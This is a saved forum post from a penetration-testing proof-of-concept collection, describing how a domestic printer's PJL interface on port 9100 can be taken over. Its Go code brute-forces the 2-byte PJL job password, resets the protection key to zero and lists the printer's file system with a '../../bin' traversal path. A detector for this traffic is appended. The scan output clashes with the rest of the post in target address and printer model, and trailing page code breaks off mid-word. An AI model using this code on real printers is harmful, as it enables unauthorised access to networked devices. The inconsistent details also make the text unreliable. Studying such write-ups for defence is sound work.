Penetration_Testing_POC/books/信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞.html

2025-06-14 06:41:49 -07:00
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns=http://www.w3.org/1999/xhtml style><!--
Page saved with SingleFile
url: https://www.t00ls.com/thread-73632-1-1.html
--><meta charset=utf-8>
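<title>Xinchuang Printers - A Domestic Printer Is Vulnerable to Arbitrary Command Execution via Its Printer Language - Original Article - T00ls | Keep a Low Profile and Grow - Study Security with Dedication</title>
<meta name=keywords content="T00ls.Com - Keep a Low Profile and Grow - Study Security with Dedication - Focus On Cyber Security">
<meta name=description content=" T00ls 1. Vulnerability Name: When the printer's port 9100 is open and the PJL protection key is easy to brute-force, an attacker can send PJL commands to gain full access and then execute arbitrary commands. 2. Vulnerability Description: Printer PJL arbitrary ... - Discuz! Board">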
<meta name=generator content="Discuz! 1.0">
<meta name=author content="Discuz! Team and Comsenz UI Team">
<meta name=copyright content="2001-2009 Comsenz Inc.">
<meta name=MSSmartTagsPreventParsing content=True>
<meta http-equiv=MSThemeCompatible content=Yes>
<meta http-equiv=X-UA-Compatible content="IE=9">
<link rel=archives title=T00ls href=https://www.t00ls.com/archiver/>
<style>*{word-wrap:break-word}html,body{border:0!important}body{background:#EEEEEE;text-align:center}body,td{color:#444;font:12px/1.6em Verdana,Helvetica,Arial,sans-serif}body,ul,li,p,h1,h2{margin:0;padding:0}ul li{list-style:none}a{text-decoration:none}a:hover{text-decoration:underline}table{empty-cells:show;border-collapse:collapse}.s_clear:after{content:".";display:block;height:0;clear:both;visibility:hidden}.s_clear{zoom:1}.wrap{text-align:left;margin:0 auto}#wrap{padding-bottom:10px;min-height:450px;border:5px solid #333333;background-color:#FFF;clear:both}.wrap{width:98%}.mainbox table{width:100%}@keyframes myanimation{0%{color:white}25%{color:yellow}50%{color:green}75%{color:brown}100%{color:red}}#wrap{border-bottom:5px solid}</style><style>.threadfix{padding-bottom:0!important;min-height:300px!important}.viewthread table{table-layout:fixed}.viewthread td.postcontent{vertical-align:top;border:none;overflow:hidden}.viewthread td.postcontent{padding:0 15px}.postmessage{clear:left}.postmessage *{line-height:normal}.postmessage h1,.postmessage h2{margin:8px 0;font-size:1.17em}.postmessage h1 a{font-weight:400;color:#444}#threadtitle{margin-bottom:8px;border-bottom:1px dashed #999}.defaultpost{padding-bottom:1em}.t_msgfont{font-size:14px;line-height:1.6em}.t_msgfont *{line-height:normal}.t_msgfont ul{margin-left:14px}.t_msgfont li{margin-left:2em}.t_msgfont ul li{list-style-type:disc}.t_attach{border:1px solid #999;background:#FFF;font-size:12px;padding:5px}.t_attach{width:130px}.t_msgfontfix table{margin-left:1px}.t_msgfontfix{min-height:100px}</style>
<style>.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;color:#24292e;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none}.markdown-body *{box-sizing:border-box}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body p,.markdown-body ul,.markdown-body ol{margin-top:0;margin-bottom:16px}.markdown-body h2{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid #eaecef}.markdown-body ul,.markdown-body ol{padding-left:2em}.markdown-body li+li{margin-top:0.25em}.markdown-body img{box-sizing:content-box;background-color:#fff}</style>
<style>.hljs{display:block;overflow-x:auto;padding:0.5em;background:#23241f!important;white-space:pre-wrap;word-wrap:break-word}.hljs{color:#f8f8f2!important}.hljs-number{color:#ae81ff}.hljs-string{color:#e6db74}.hljs-meta{color:#75715e}</style>
<meta name=referrer content=no-referrer><style>.sf-hidden{display:none!important}</style><link rel=canonical href=https://www.t00ls.com/thread-73632-1-1.html><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"></head>
<body id=viewthread>
<div id=append_parent style=display:none!important></div><div id=ajaxwaitid style=display:none!important></div>
<div id=header style=display:none!important>
</div>
<div id=nav style=display:none!important>
</div>
<div id=ad_text style=display:none!important></div>
<div id=wrap class="wrap s_clear threadfix">
<div class=forumcontrol style=display:none!important>
</div>
<div id=postlist class="mainbox viewthread"><div id=post_1216668><table id=pid1216668 summary=pid1216668 cellspacing=0 cellpadding=0>
<tbody><tr>
<td class=postauthor rowspan=2 style=display:none!important>
</td>
<td class=postcontent>
<div id=threadstamp style=display:none!important></div><div class=postinfo style=display:none!important>
</div>
<div class=defaultpost>
<div id=ad_thread2_0 style=display:none!important></div><div id=ad_thread3_0 style=display:none!important></div><div id=ad_thread4_0 style=display:none!important></div>
<div class="postmessage firstpost">
<div id=threadtitle>
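<em style=display:none!important>Required reading permission: 10</em><h1><a href="https://www.t00ls.com/forumdisplay.php?fid=52&amp;filter=type&amp;typeid=1">[Original]</a> Xinchuang Printers - A Domestic Printer Is Vulnerable to Arbitrary Command Execution via Its Printer Language</h1>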
</div>
<div class=t_msgfontfix>
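<table cellspacing=0 cellpadding=0><tbody><tr><td class=t_msgfont id=postmessage_1216668><div class=markdown-body><h2>1. Vulnerability Name</h2>
<p>When the printer's port 9100 is open and the PJL protection key is easy to brute-force, an attacker can send PJL commands to gain full access and then execute arbitrary commands.</p>
<h2>2. Vulnerability Description</h2>
<p>In the printer PJL arbitrary command execution vulnerability, port 9100 on the printer is open and an attacker can send PJL commands to it to request the device name. Because the PJL protection key is stored in only 2 bytes, it can be brute-forced, which gives the attacker full access and lets them execute arbitrary commands at will.</p>
<h2>3. Vulnerability Analysis</h2>
<ul>
<li>Port scan - example</li>
</ul>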
<pre><code class="language-shell hljs"><span class=hljs-meta>$</span><span class=bash> nmap -Pn 192.168.1.1 </span>
Starting Nmap 7.94 ( https://nmap.org ) at 2025-05-22 14:30 CST
Nmap scan results for printer-ip (192.168.1.100)
Host is up (0.042s latency).
PORT STATE SERVICE
9100/tcp open lpd
| lpd-version:
| SERVER: HP LaserJet Pro MFP M428fdw
|_ VERSION: HP PJL 5.0 (PostScript Level 3)
MAC Address: XX:XX:XX:XX:XX:XX (HP Inc.)</code></pre>
<ul>
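<li>Analyzing the packets</li>
</ul>
<p>On a default Windows system, you can connect to a network printer by entering its IP address in the Add Printer feature and then print a test page. Capturing the network interface with Wireshark at that point lets you analyze the packets exchanged between the endpoint and the printer, including details such as the protocol type and the data transmitted.</p>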
<p>The packet data is as follows:</p>
<pre><code class="language-js hljs javascript">.print
.<span class=hljs-number>.88</span> cfA018DESKTOP<span class=hljs-number>-10E6</span>T52
.HDESKTOP<span class=hljs-number>-10E6</span>T52
Ptest
Jnew <span class=hljs-number>2</span>
ldfA018DESKTOP<span class=hljs-number>-10E6</span>T52
UdfA018DESKTOP<span class=hljs-number>-10E6</span>T52
Nnew <span class=hljs-number>2</span>
..<span class=hljs-number>.125899906843000</span> dfA018DESKTOP<span class=hljs-number>-10E6</span>T52
..%<span class=hljs-number>-12345</span>X@PJL COMMENT HanGuang BMF <span class=hljs-number>6000</span> Series PCL6 <span class=hljs-number>1.23</span><span class=hljs-number>.1</span><span class=hljs-number>.7</span>
@PJL JOB DISPLAY=<span class=hljs-string>"new 2"</span>
@PJL JOB NAME=<span class=hljs-string>"new 2"</span>
@PJL SET JOBATTR=<span class=hljs-string>"DocumentName=new 2"</span>
@PJL SET JOBATTR=<span class=hljs-string>"ComputerName=DESKTOP-10E6T52"</span>
@PJL SET JOBATTR=<span class=hljs-string>"UserName=xxxx"</span>
@PJL SET JOBATTR=<span class=hljs-string>"ReceptionTime=16:29:28 2021/10/27"</span>
@PJL SET PAPER=A4
@PJL SET ROTATESORT=OFF
@PJL SET ORIENTATION=PORTRAIT
@PJL SET RESOLUTION=<span class=hljs-number>600</span>
@PJL SET MEDIATYPE=AUTOSELECT
@PJL SET STAPLE=OFF
@PJL SET DUPLEX=OFF
@PJL SET HOLD=NORMAL
@PJL SET ECONOMODE=OFF
@PJL SET AUTHENTICATIONUSERID=<span class=hljs-string>""</span>
@PJL SET AUTHENTICATIONPASSWORD=<span class=hljs-string>""</span>
@PJL SET AUTHENTICATIONGROUPID=<span class=hljs-string>""</span>
@PJL SET AUTHENTICATIONGROUPPW=<span class=hljs-string>""</span>
@PJL SET BRIGHTNESS=<span class=hljs-string>"A:0"</span>
@PJL SET CONTRAST=<span class=hljs-string>"A:1"</span>
@PJL SET TONERDARKNESS=<span class=hljs-number>5</span>
@PJL SET QTY=<span class=hljs-number>1</span>
@PJL ENTER LANGUAGE=POSTSCRIPT
) HP-PCL XL;<span class=hljs-number>3</span>;<span class=hljs-number>0</span>;Comment Copyright(c) <span class=hljs-number>1999</span><span class=hljs-number>-2003</span> Microsoft Corporation
.X.X...........A........H...&amp;...(..<span class=hljs-number>.4</span>...Standard.<span class=hljs-string>'...%C.`.`..*u....?...?.+w....j...,{...-x...-|...,{...,{.....y... c..;.s......B..... c........MS PCLXLFont 001..O.....P...........
...P.
BR.....X.X.....P........Q....MS PCLXLFont 001......B.......o....?...?..e....MS PCLXLFont 001..R..........S..... .4. .4............................p.............................................................................................................................................................................................S.............T.;....Lk..................222.......s..Lk...,{... c....s......B.....s..Lk....s......B.....s..Lk....s.,....B.....,{.... c....MS PCLXLFont 001..R..........S.......0.%.0.................p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p.8..p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p....p...........................S.......0.'</span><span class=hljs-number>.0</span>..................<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>.........................................................................................................................................................................................S.........<span class=hljs-number>.1</span>.#<span class=hljs-number>.2</span>......?..........................................<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>...<span class=hljs-number>.8</span>....&lt;.........................................................?.........................................................................................&gt;.....................T......Lk.................<span class=hljs-number>.222</span>.......<span 
class=hljs-number>.1</span>D....MS PCLXLFont <span class=hljs-number>001.</span>.UIB.%<span class=hljs-number>-12345</span>X@PJL EOJ
.%<span class=hljs-number>-12345</span>X.</code></pre>
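<p>Analysis of the captured traffic shows that the print instructions received by the printer follow the PJL (Printer Job Language) syntax. The protocol carries job-control commands, status queries and similar information between the endpoint and the printer.</p>
<ul>
<li>An unexpected situation</li>
</ul>
<p>Earlier, security protection mode was enabled by accident, which made it impossible to execute PJL commands. After consulting the documentation, I learned that the user's identity must be authenticated before PJL commands are sent to the printer. I later found that this authentication mechanism can be brute-forced: because the authentication key is 2 bytes long, the authentication can be bypassed by brute force, and PJL commands can then be executed arbitrarily.</p>
<ul>
<li>Brute-forcing the password</li>
</ul>
<p>Brute force + disabling password protection</p>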
<pre><code class=language-golang>func (c *Cli) CrackPass() {
	// The key is 2 bytes long, so the loop covers all 65536 values.
	for i := 0; i &lt; 65536; i++ {
		PjlPass := fmt.Sprintf("JOB PASSWORD=%d\r\n", i)
		CrackPassInfo := START + PjlPass + END
		log.Println(CrackPassInfo)
		data := []byte(CrackPassInfo)
		c.conn.Write(data)
		// Disable password protection
		PjlDefaultPass := "DEFAULT PASSWORD=0\r\n"
		DefaultPassInfo := START + PjlDefaultPass + END
		log.Println(DefaultPassInfo)
		data = []byte(DefaultPassInfo)
		c.conn.Write(data)
	}
}</code></pre>
<p>How is the password set?</p>
<pre><code class=language-golang>func (c *Cli) SetPassWord() {
	log.Println("Start to Set Password!")
	InfoId := "@PJL DEFAULT PASSWORD=61220\r\n"
	DeviceId := START + InfoId + END
	data := []byte(DeviceId)
	c.conn.Write(data)
	rsp, err := ioutil.ReadAll(c.conn)
	if err != nil {
		fmt.Println(err.Error())
		return
	}
	fmt.Println(string(rsp))
}
</code></pre>
<h2>4. Reproducing the Vulnerability</h2>
<ul>
<li>Obtaining the printer's system root directory</li>
</ul>
<pre><code class=language-golang>// START is the UEL escape sequence followed by the "@PJL " prefix; END is a closing UEL.
const START = "\033%-12345X@PJL "
const END = "\033%-12345X\r\n"

func (c *Cli) ListDirectory(path string) {
	// ../../bin
	log.Println("Start to Query Printer Directory!")
	InfoId := fmt.Sprintf("@PJL FSDIRLIST NAME=\"%s\" ENTRY=1 COUNT=1024\r\n", path)
	DeviceId := START + InfoId + END
	data := []byte(DeviceId)
	c.conn.Write(data)
	rsp, err := ioutil.ReadAll(c.conn)
	if err != nil {
		log.Println("Error:", err.Error())
		return
	}
	log.Println("Printer Response: " + string(rsp))
}</code></pre>
<ul>
<li>Response packets</li>
</ul>
<ol>
<li>Printer string</li>
<li>Get the device ID</li>
<li>Get the device's root file system directory</li>
</ol>
<h2>5. Vulnerability Fix</h2>
<p>The vulnerability has been fixed in the new version.</p>
<p>Self-assessed TCV: 2</p></div>
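<p>An added example, not part of the original post and not vendor code: a Go detector for the port 9100 traffic described above. It parses reassembled payloads and flags repeated JOB PASSWORD guesses from one source, DEFAULT PASSWORD=0, and file-system commands such as FSDIRLIST. The Event log shape, the rule names, the threshold and the sample addresses are assumptions, and the sample traffic is constructed.</p>

```go
package main

import (
	"fmt"
	"strings"
)

// UEL frames PJL on the raw port; same bytes as the page's START/END constants.
const UEL = "\x1b%-12345X"

// Event is one reassembled port-9100 payload and Finding one alert (assumed shapes).
type Event struct{ Source, Payload string }
type Finding struct{ Source, Rule, Detail string }

// PJLCommands returns a payload's PJL commands without "@PJL"; page data is skipped.
func PJLCommands(payload string) []string {
	var cmds []string
	for _, line := range strings.Split(strings.ReplaceAll(payload, UEL, "\n"), "\n") {
		line = strings.TrimSpace(line)
		found := false
		// Strip repeated prefixes: the page's START + "@PJL ..." yields "@PJL @PJL ...".
		for len(line) >= 4 && strings.EqualFold(line[:4], "@PJL") {
			line, found = strings.TrimSpace(line[4:]), true
		}
		if found && line != "" {
			cmds = append(cmds, line)
		}
	}
	return cmds
}

// Analyze flags password guessing, protection being disabled, and file-system commands.
func Analyze(events []Event, guessThreshold int) []Finding {
	var out []Finding
	counted := map[string]bool{} // source|command pairs already counted
	guesses := map[string]int{}  // distinct JOB PASSWORD values per source
	for _, ev := range events {
		for _, cmd := range PJLCommands(ev.Payload) {
			// Compare upper-cased and without whitespace so "PASSWORD = 0" also matches.
			n := strings.ToUpper(strings.Join(strings.Fields(cmd), ""))
			switch {
			case strings.HasPrefix(n, "JOBPASSWORD="):
				if key := ev.Source + "|" + n; !counted[key] {
					counted[key] = true
					if guesses[ev.Source]++; guesses[ev.Source] == guessThreshold {
						out = append(out, Finding{ev.Source, "pjl-password-guessing",
							fmt.Sprintf("%d distinct JOB PASSWORD values", guessThreshold)})
					}
				}
			case n == "DEFAULTPASSWORD=0":
				out = append(out, Finding{ev.Source, "pjl-protection-disabled", cmd})
			case strings.HasPrefix(n, "FS"): // FSDIRLIST, FSUPLOAD, FSDOWNLOAD, ...
				out = append(out, Finding{ev.Source, "pjl-filesystem-command", cmd})
			}
		}
	}
	return out
}

// SampleEvents returns constructed traffic: one driver job and one guessing source.
func SampleEvents() []Event {
	evs := []Event{{"192.0.2.10", UEL + "@PJL JOB NAME=\"new 2\"\r\n@PJL SET PAPER=A4\r\n" +
		"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n\x00binary page data\r\n" + UEL + "@PJL EOJ\r\n" + UEL}}
	for i := 0; i != 6; i++ {
		evs = append(evs, Event{"192.0.2.66", fmt.Sprintf("%s@PJL JOB PASSWORD=%d\r\n%s", UEL, i, UEL)})
	}
	return append(evs,
		Event{"192.0.2.66", UEL + "@PJL DEFAULT PASSWORD=0\r\n" + UEL},
		Event{"192.0.2.66", UEL + "@PJL @PJL FSDIRLIST NAME=\"../../bin\" ENTRY=1 COUNT=1024\r\n" + UEL})
}

func main() {
	fmt.Printf("%+v\n", Analyze(SampleEvents(), 5))
}
```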
</table>
</div>
</div>
</div>
</tr>
</table>
</div>
</div>
</div>
<div id=immersive-translate-browser-popup style=color-scheme:initial;forced-color-adjust:initial;mask:initial;math-depth:initial;position:initial;position-anchor:initial;text-size-adjust:initial;appearance:initial;color:initial;font:initial;font-palette:initial;font-synthesis:initial;position-area:initial;text-orientation:initial;text-rendering:initial;text-spacing-trim:initial;-webkit-font-smoothing:initial;-webkit-locale:initial;-webkit-text-orientation:initial;-webkit-writing-mode:initial;writing-mode:initial;zoom:initial;accent-color:initial;place-content:initial;place-items:initial;place-self:initial;alignment-baseline:initial;anchor-name:initial;anchor-scope:initial;animation-composition:initial;animation:initial;app-region:initial;aspect-ratio:initial;backdrop-filter:initial;backface-visibility:initial;background:initial;background-blend-mode:initial;baseline-shift:initial;baseline-source:initial;block-size:initial;border-block:initial;border:initial;border-radius:initial;border-collapse:initial;border-end-end-radius:initial;border-end-start-radius:initial;border-inline:initial;border-start-end-radius:initial;border-start-start-radius:initial;inset:initial;box-decoration-break:initial;box-shadow:initial;box-sizing:initial;break-after:initial;break-before:initial;break-inside:initial;buffered-rendering:initial;caption-side:initial;caret-color:initial;clear:initial;clip:initial;clip-path:initial;clip-rule:initial;color-interpolation:initial;color-interpolation-filters:initial;color-rendering:initial;columns:initial;column-fill:initial;gap:initial;column-rule:initial;column-span:initial;contain:initial;contain-intrinsic-block-size:initial;contain-intrinsic-size:initial;contain-intrinsic-inline-size:initial;container:initial;content:initial;content-visibility:initial;counter-increment:initial;counter-reset:initial;counter-set:initial;cursor:initial;cx:initial;cy:initial;d:initial;display:none!important;dominant-baseline:initial;dynamic-range-limit:initial;empty-c
ells:initial;field-sizing:initial;fill:initial;fill-opacity:initial;fill-rule:initial;filter:initial;flex:initial;flex-flow:initial;float:initial;flood-color:initial;flood-opacity:initial;grid:initial;grid-area:initial;height:initial;hyphenate-character:initial;hyphenate-limit-chars:initial;hyphens:initial;image-orientation:initial;image-rendering:initial;initial-letter:initial;inline-size:initial;inset-block:initial;inset-inline:initial;interpolate-size:initial;isolation:initial;letter-spacing:initial;lighting-color:initial;line-break:initial;list-style:initial;margin-block:initial;margin:initial;margin-inline:initial;marker:initial;mask-type:initial;math-shift:initial;math-style:initial;max-block-size:initial;max-height:initial;max-inline-size:initial;max-width:initial;min-block-size:initial;min-height:initial;min-inline-size:initial;min-width:initial;mix-blend-mode:initial;object-fit:initial;object-position:initial;object-view-box:initial;offset:initial;opacity:initial;order:initial;orphans:initial;outline:initial;outline-offset:initial;overflow-anchor:initial;overflow-block:initial;overflow-clip-margin:initial;overflow-inline:initial;overflow-wrap:initial;overflow:initial;overlay:initial;overscroll-behavior-block:initial;overscroll-behavior-inline:initial;overscroll-behavior:initial;padding-block:initial;padding:initial;padding-inline:initial;page:initial;page-orientation:initial;paint-order:initial;perspective:initial;perspective-origin:initial;pointer-events:initial;position-try:initial;position-visibility:initial;print-color-adjust:initial;quotes:initial;r:initial;resize:initial;rotate:initial;ruby-align:initial;ruby-position:initial;rx:initial;ry:initial;scale:initial;scroll-behavior:initial;scroll-initial-target:initial;scroll-margin-block:initial;scroll-margin:initial;scroll-margin-inline:initial;scroll-marker-group:initial;scroll-padding-block:initial;scroll-padding:initial;scroll-padding-inline:initial;scroll-snap-align:initial;scroll-snap-stop:initial;s
croll-snap-type:initial;scroll-timeline:initial;scrollbar-color:initial;scrollbar-gutter:initia
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media 
(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color 
Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c